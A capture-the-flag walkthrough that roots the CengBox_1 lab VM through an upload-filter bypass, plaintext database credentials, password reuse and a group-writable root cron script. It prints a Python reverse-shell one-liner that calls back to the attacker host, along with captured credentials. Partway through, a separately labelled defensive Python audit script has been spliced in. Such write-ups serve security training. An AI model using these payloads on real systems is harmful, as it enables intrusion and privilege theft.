# CengBox_1 VM

## Information gathering

```
┌──(kali㉿kali)-[~/Documents/CengBox]
└─$ sudo nmap --min-rate 10000 -p- 192.168.1.102
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

Ports 22 and 80 are open.
```
┌──(kali㉿kali)-[~/Documents/CengBox]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.1.102
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a9:cc:28:f3:8c:f5:0e:3f:5a:ed:13:f3:ad:53:13:9b (RSA)
|   256 f7:3a:a3:ff:a1:f7:e5:1b:1e:6f:58:5f:c7:02:55:9b (ECDSA)
|_  256 f0:dd:2e:1d:3d:0a:e8:c1:5f:52:7c:55:2c:dc:1e:ef (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: CEng Company
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

The operating system is Ubuntu.
```
┌──(kali㉿kali)-[~/Documents/CengBox]
└─$ sudo nmap --script=vuln -p22,80 192.168.1.102
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-fileupload-exploiter:
|
|_  Couldn't find a file-type field.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
```

The vulnerability scripts turned up nothing of value.

## Directory brute-forcing

Let's brute-force directories.
```
┌──(kali㉿kali)-[~/Documents/CengBox]
└─$ sudo dirsearch -u http://192.168.1.102
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
[07:31:24] 301 -  311B  - /js  ->  http://192.168.1.102/js/
[07:31:39] 301 -  312B  - /css  ->  http://192.168.1.102/css/
[07:31:42] 200 -    3KB - /gulpfile.js
[07:31:43] 301 -  312B  - /img  ->  http://192.168.1.102/img/
[07:31:43] 200 -    6KB - /index.php
[07:31:43] 200 -    6KB - /index.php/login/
[07:31:44] 403 -  278B  - /js/
[07:31:45] 301 -  320B  - /masteradmin  ->  http://192.168.1.102/masteradmin/
[07:31:52] 403 -  278B  - /server-status
[07:31:52] 403 -  278B  - /server-status/
[07:31:56] 301 -  316B  - /uploads  ->  http://192.168.1.102/uploads/
[07:31:56] 403 -  278B  - /uploads/
[07:31:57] 403 -  278B  - /vendor/
```

A few interesting directories, but they all return 403: img, masteradmin, uploads.

Let's look at the web interface first.

Some information collected from it:

```
web title: CEng Company
cengover@cengbox.com
+1 (555) 902-8832
1142 Baker Street, London UK
```

Still no attack entry point, so try scanning the second-level directory.
```
┌──(kali㉿kali)-[~/Documents/CengBox]
└─$ sudo dirsearch -u http://192.168.1.102/masteradmin/
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
[07:43:49] 301 -  324B  - /masteradmin/css  ->  http://192.168.1.102/masteradmin/css/
[07:43:50] 200 -    0B  - /masteradmin/db.php
[07:43:52] 301 -  326B  - /masteradmin/fonts  ->  http://192.168.1.102/masteradmin/fonts/
[07:43:53] 301 -  327B  - /masteradmin/images  ->  http://192.168.1.102/masteradmin/images/
[07:43:53] 403 -  278B  - /masteradmin/images/
[07:43:55] 403 -  278B  - /masteradmin/js/
[07:43:56] 200 -    5KB - /masteradmin/login.php
[07:44:09] 200 -    1KB - /masteradmin/upload.php
[07:44:10] 403 -  278B  - /masteradmin/vendor/
```

This reveals a few accessible files worth a look.

The login page's HTML source holds no hidden information.

### Crafting an upload request

Visiting upload.php redirects to the login page; let's check the history in Burp.

JavaScript redirects us to login.php, but scrolling down in the response reveals something interesting:
```html
<form action="" method="POST" enctype="multipart/form-data">
  <input type="file" multiple name="image" id="image">
  <p>Drag your files here or click in this area.</p>
  <button type="submit" name="submit">Upload</button>
</form>
```

Even though it redirected, the response body still contains the upload form, which means we can reach upload.php normally: build the request ourselves and send it with Burp. To make crafting the request easier, I set the form's action value in the page code above to the remote target host and saved it as a local HTML file, so I can simply click upload and capture the request.

```html
action="http://192.168.1.102/masteradmin/upload.php"
```

The response says: extension not allowed, please choose a CENG file.

Tried changing the Content-Type; no effect. Stuck for a while.

Tried changing the file extension instead.

Success. During the earlier directory brute-force we found the uploads directory, even though it returned 403.

Start the listener in advance, then visit http://192.168.1.102/uploads/1.ceng
```
┌──(kali㉿kali)-[~/Documents/CengBox]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 56028
Linux cengbox 4.4.0-177-generic
 15:15:19 up 57 min,  0 users,  load average: 0.00, 0.00, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:f8:53:a5 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.102/24 brd 192.168.1.255 scope global enp0s3
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fef8:53a5/64 scope link
       valid_lft forever preferred_lft forever
$ uname -a
Linux cengbox 4.4.0-177-generic #207-Ubuntu SMP Mon Mar 16 01:16:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
$ which python
$ which python2
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@cengbox:/$
```

## Privilege escalation

### Checking the database config file

Look through the web root. Since there is a login page, look for the database configuration file as well and see whether the database password is stored in plaintext.
```
www-data@cengbox:/var/www/html$ ls -liha
total 52K
 922200 drwxr-xr-x 9 www-data www-data 4.0K Apr 29  2020 .
 922199 drwxr-xr-x 3 root     root     4.0K Apr 25  2020 ..
 916283 -rw-r--r-- 1 www-data www-data   97 Apr 29  2020 .htaccess
1050978 drwxr-xr-x 2 www-data www-data 4.0K Apr 26  2020 css
1051150 -rw-r--r-- 1 www-data www-data 3.5K Sep 17  2019 gulpfile.js
1050981 drwxr-xr-x 2 www-data www-data 4.0K Apr 26  2020 img
 916246 -rw-r--r-- 1 www-data www-data 5.7K Apr 28  2020 index.php
1050984 drwxr-xr-x 2 www-data www-data 4.0K Apr 26  2020 js
 915850 drwxr-xr-x 7 www-data www-data 4.0K Apr 29  2020 masteradmin
1050987 drwxr-xr-x 2 www-data www-data 4.0K Apr 26  2020 scss
   2691 drwxr-xr-x 2 www-data www-data 4.0K Oct 16 15:15 uploads
 925140 drwxr-xr-x 6 www-data www-data 4.0K Apr 26  2020 vendor
www-data@cengbox:/var/www/html$ cd masteradmin
www-data@cengbox:/var/www/html/masteradmin$ ls -liah
total 44K
 915850 drwxr-xr-x  7 www-data www-data 4.0K Apr 29  2020 .
 922200 drwxr-xr-x  9 www-data www-data 4.0K Apr 29  2020 ..
1055493 drwxr-xr-x  2 www-data www-data 4.0K Apr 26  2020 css
 916187 -rw-r--r--  1 www-data www-data  311 Apr 27  2020 db.php
 915922 drwxr-xr-x  5 www-data www-data 4.0K Apr 26  2020 fonts
 915857 drwxr-xr-x  3 www-data www-data 4.0K Apr 26  2020 images
   2671 drwxr-xr-x  2 www-data www-data 4.0K Apr 26  2020 js
 916415 -rw-r--r--  1 www-data www-data 5.7K Apr 28  2020 login.php
 916189 -rw-r--r--  1 www-data www-data 2.2K Apr 29  2020 upload.php
 915876 drwxr-xr-x 10 www-data www-data 4.0K Apr 26  2020 vendor
www-data@cengbox:/var/www/html/masteradmin$ cat db.php
<?php
$serverName = "localhost";
$username = "root";
$password = "SuperS3cR3TPassw0rd1!";
$dbName = "cengbox";
//Create Connection
$conn = new mysqli($serverName, $username, $password, $dbName);
//Check Connection
if ($conn->connect_error) {
    die("Connection Failed: " . $conn->connect_error);
} else {
}
?>
```

Got the database password: SuperS3cR3TPassw0rd1!

Try this password to switch to other users.
```
www-data@cengbox:/var/www/html/masteradmin$ ls -liah /home
total 16K
654081 drwxr-xr-x  4 root     root     4.0K Apr 25  2020 .
     2 drwxr-xr-x 23 root     root     4.0K Apr 26  2020 ..
793691 drwxr-xr-x  3 root     root     4.0K Apr 25  2020 .ecryptfs
793690 dr-x------  2 cengover cengover 4.0K Apr 25  2020 cengover
www-data@cengbox:/var/www/html/masteradmin$ su cengover
Password: SuperS3cR3TPassw0rd1!
su: Authentication failure
```

Log into the database and take a look.
```
www-data@cengbox:/var/www/html/masteradmin$ mysql -uroot -p
Enter password: SuperS3cR3TPassw0rd1!
mysql> select * from admin;
+----+-------------+---------------+
| id | username    | password      |
+----+-------------+---------------+
|  1 | masteradmin | C3ng0v3R00T1! |
+----+-------------+---------------+
```

The database stores the admin password in plaintext.

### Password reuse: switching user

Switch user with this password.
```
www-data@cengbox:/var/www/html/masteradmin$ ps aux | grep mysql
mysql     1137  0.2 14.6 1116336 148404 ?   Ssl  14:17   0:08 /usr/sbin/mysqld
www-data  2000  0.0  0.0   11280   1008 pts/0 S+   15:21   0:00 grep mysql
www-data@cengbox:/var/www/html/masteradmin$ su cengover
Password: C3ng0v3R00T1!
```

Login succeeded. Basic enumeration next: check the user's sudo rights and home directory.
```
cengover@cengbox:/var/www/html/masteradmin$ sudo -l
[sudo] password for cengover: C3ng0v3R00T1!
Sorry, user cengover may not run sudo on cengbox.
cengover@cengbox:/var/www/html/masteradmin$ cd ~
cengover@cengbox:~$ ls -alih
total 116K
793696 drwx------ 4 cengover cengover 4.0K Apr 29  2020 .
654081 drwxr-xr-x 4 root     root     4.0K Apr 25  2020 ..
785396 -rw------- 1 cengover cengover    0 Apr 29  2020 .bash_history
793703 -rw-r--r-- 1 cengover cengover  220 Apr 25  2020 .bash_logout
793704 -rw-r--r-- 1 cengover cengover 3.7K Apr 25  2020 .bashrc
793688 drwx------ 2 cengover cengover 4.0K Apr 25  2020 .cache
793701 lrwxrwxrwx 1 cengover cengover   34 Apr 25  2020 .ecryptfs -> /home/.ecryptfs/cengover/.ecryptfs
785233 -rw------- 1 cengover cengover  478 Apr 27  2020 .mysql_history
785217 drwxrwxr-x 2 cengover cengover 4.0K Apr 26  2020 .nano
793702 lrwxrwxrwx 1 cengover cengover   33 Apr 25  2020 .Private -> /home/.ecryptfs/cengover/.Private
793705 -rw-r--r-- 1 cengover cengover  655 Apr 25  2020 .profile
793707 -rw-r--r-- 1 cengover cengover    0 Apr 25  2020 .sudo_as_admin_successful
785383 -rw-rw-r-- 1 cengover cengover   33 Apr 29  2020 user.txt
785231 -rw------- 1 cengover cengover 7.0K Apr 29  2020 .viminfo
cengover@cengbox:~$ cat user.txt
8f7f6471e2e869f029a75c5de601d5e0
```

Look at the SUID files.
```
cengover@cengbox:/home/cengover$ find / -type f -perm -04000 -ls 2>/dev/null
1046604   44 -rwsr-xr-x   1 root     root        44680 May  7  2014 /bin/ping6
1046620   40 -rwsr-xr-x   1 root     root        40128 May 17  2017 /bin/su
1046589   40 -rwsr-xr-x   1 root     root        40152 May 16  2018 /bin/mount
1046603   44 -rwsr-xr-x   1 root     root        44168 May  7  2014 /bin/ping
1046638   28 -rwsr-xr-x   1 root     root        27608 May 16  2018 /bin/umount
1050914   32 -rwsr-xr-x   1 root     root        30800 Jul 12  2016 /bin/fusermount
 923699   20 -rwsr-xr-x   1 root     root        19024 Jul 13  2016 /sbin/mount.ecryptfs_private
 406290   52 -rwsr-sr-x   1 daemon   daemon      51464 Jan 15  2016 /usr/bin/at
 405770   36 -rwsr-xr-x   1 root     root        32944 May 17  2017 /usr/bin/newgidmap
 392482   52 -rwsr-xr-x   1 root     root        49584 May 17  2017 /usr/bin/chfn
 392622   56 -rwsr-xr-x   1 root     root        54256 May 17  2017 /usr/bin/passwd
 392545   76 -rwsr-xr-x   1 root     root        75304 May 17  2017 /usr/bin/gpasswd
 410350   24 -rwsr-xr-x   1 root     root        23376 Mar 27  2019 /usr/bin/pkexec
 405769   36 -rwsr-xr-x   1 root     root        32944 May 17  2017 /usr/bin/newuidmap
 393725  136 -rwsr-xr-x   1 root     root       136808 Jan 31  2020 /usr/bin/sudo
 392611   40 -rwsr-xr-x   1 root     root        39904 May 17  2017 /usr/bin/newgrp
 392484   40 -rwsr-xr-x   1 root     root        40432 May 17  2017 /usr/bin/chsh
 785419   44 -rwsr-xr--   1 root     messagebus  42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 410362  100 -rwsr-sr-x   1 root     root        98472 Mar 18  2019 /usr/lib/snapd/snap-confine
 405752   40 -rwsr-xr-x   1 root     root        38984 Jun 14  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
 410346   16 -rwsr-xr-x   1 root     root        14864 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
 392808   12 -rwsr-xr-x   1 root     root        10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
 393903  420 -rwsr-xr-x   1 root     root       428240 Mar  4  2019 /usr/lib/openssh/ssh-keysign
```

Try switching to root with the passwords obtained so far.
```
cengover@cengbox:/$ su
Password: SuperS3cR3TPassw0rd1!
su: Authentication failure
cengover@cengbox:/$ su
Password: C3ng0v3R00T1!
su: Authentication failure
```

Check the permissions on sensitive files and look at the cron configuration.
```
cengover@cengbox:/$ ls -alih /etc/shadow /etc/passwd
132989 -rw-r--r-- 1 root root   1.6K Apr 25  2020 /etc/passwd
134692 -rw-r----- 1 root shadow 1.1K Apr 25  2020 /etc/shadow
cengover@cengbox:/$ cat /etc/crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
```

### Using pspy64 to look for scheduled tasks

After logging in over SSH, run pspy64 to see whether any scheduled task is executing.
```
2023/10/16 15:39:01 CMD: UID=0 PID=2290 | /usr/bin/python3 /opt/md5check.py
```

A Python script is being run periodically as root. Check the file's permissions.
```
cengover@cengbox:/tmp$ ls -liah /opt/md5check.py
916210 -rw-rw---- 1 root users 545 Apr 29  2020 /opt/md5check.py
```

And the user we are logged in as is also a member of the users group:
```
cengover@cengbox:/tmp$ id
uid=1000(cengover) gid=1000(cengover) groups=1000(cengover),4(adm),24(cdrom),30(dip),46(plugdev),100(users),110(lxd),117(lpadmin),118(sambashare)
```
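The root cause here is a script executed by root's cron that a non-root group can write. The following Python is an added defensive check, not part of the original writeup or of the CengBox VM: it parses pspy output for scripts launched as UID 0 and flags any that a non-root owner, a non-root group, or everyone can modify. The pspy sample is constructed from the line shown above (its second line is made up to show non-root commands being ignored), and the file metadata in the test is taken from the `ls -liah /opt/md5check.py` output.

```python
import os
import re
import stat
from typing import Callable, List, Tuple

# Constructed sample of pspy output, modelled on the line in the writeup; the
# second line is made up to show that commands not run as UID 0 are ignored.
SAMPLE_PSPY = """\
2023/10/16 15:39:01 CMD: UID=0 PID=2290 | /usr/bin/python3 /opt/md5check.py
2023/10/16 15:40:01 CMD: UID=1000 PID=2301 | /bin/sh /home/cengover/example.sh
"""
PSPY_RE = re.compile(r"CMD: UID=(?P<uid>\d+) PID=\d+ \| (?P<cmd>.+)$")
INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "perl"}
Finding = Tuple[str, str]  # (script path, reason it is exposed)

def root_run_scripts(pspy_text: str) -> List[str]:
    """Scripts that pspy saw an interpreter launch as UID 0, in order of first sight."""
    seen: List[str] = []
    for line in pspy_text.splitlines():
        m = PSPY_RE.search(line)
        if not m or m.group("uid") != "0":
            continue
        argv = m.group("cmd").split()
        if not argv or os.path.basename(argv[0]) not in INTERPRETERS:
            continue
        # the first absolute path after the interpreter is the script it executes
        path = next((a for a in argv[1:] if a.startswith("/")), None)
        if path and path not in seen:
            seen.append(path)
    return seen

def audit_mode(path: str, st_uid: int, st_gid: int, st_mode: int) -> List[Finding]:
    """Every way a non-root account could change a script that root executes."""
    found: List[Finding] = []
    if st_uid != 0:
        found.append((path, f"owned by uid {st_uid}, not root"))
    if st_mode & stat.S_IWOTH:
        found.append((path, "world-writable"))
    if st_mode & stat.S_IWGRP and st_gid != 0:
        found.append((path, f"group-writable by gid {st_gid}"))
    return found

def audit_pspy(pspy_text: str, stat_fn: Callable[[str], os.stat_result] = os.stat) -> List[Finding]:
    """stat_fn is injectable so the audit can run against recorded metadata."""
    findings: List[Finding] = []
    for path in root_run_scripts(pspy_text):
        st = stat_fn(path)
        findings.extend(audit_mode(path, st.st_uid, st.st_gid, st.st_mode))
    return findings
```

On a live host, `audit_pspy(open("pspy.log").read())` runs the check against the real files; note that it does not inspect the parent directory, and a writable /opt would let the script be replaced rather than edited.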
### Writing to the cron script

Write a reverse shell directly into the file.

```
cengover@cengbox:/tmp$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' > /opt/md5check.py
```

cat the file to confirm the write succeeded.

Start the listener and wait for the callback.
```
┌──(kali㉿kali)-[~/Documents/CengBox]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 56034
root@cengbox:~# whoami
root
root@cengbox:~# id
uid=0(root) gid=0(root) groups=0(root)
root@cengbox:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:f8:53:a5 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.102/24 brd 192.168.1.255 scope global enp0s3
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fef8:53a5/64 scope link
       valid_lft forever preferred_lft forever
root@cengbox:~# uname -a
Linux cengbox 4.4.0-177-generic
```

Root obtained.
```
root@cengbox:~# ls -liah
total 48K
392450 drwx------  3 root root 4.0K Apr 29  2020 .
     2 drwxr-xr-x 23 root root 4.0K Apr 26  2020 ..
393878 -rw-------  1 root root    5 Apr 29  2020 .bash_history
392451 -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
392654 drwxr-xr-x  2 root root 4.0K Apr 26  2020 .nano
393896 -rw-r--r--  1 root root 6.5K Oct 16 15:45 note.txt
392452 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
394459 -rw-r--r--  1 root root  420 Apr 29  2020 root.txt
392706 -rw-r--r--  1 root root   66 Apr 28  2020 .selected_editor
394464 -rw-------  1 root root 5.3K Apr 29  2020 .viminfo
root@cengbox:~# cat root.txt
(ASCII-art banner)
Congrats. Hope you enjoyed it and you can contact me on Twitter @arslanblcn_
a51e522b22a439b8e1b22d84f71cf0f2
```

Grab the flag and we are done.

## Summary

Not a difficult box. It requires solid enumeration: brute-forcing the second-level directory, and at the end locating the script that the cron job executes.